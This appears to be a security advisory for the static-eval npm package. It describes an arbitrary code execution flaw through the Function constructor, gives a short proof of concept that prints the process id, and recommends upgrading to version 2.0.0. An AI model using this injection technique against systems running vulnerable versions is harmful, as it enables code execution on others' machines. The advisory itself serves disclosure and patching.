Affected versions of static-eval
pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id
Update to version 2.0.0 or later.
{ "nvd_published_at": null, "github_reviewed_at": "2020-06-16T21:16:46Z", "github_reviewed": true, "severity": "MODERATE", "cwe_ids": [ "CWE-20" ] }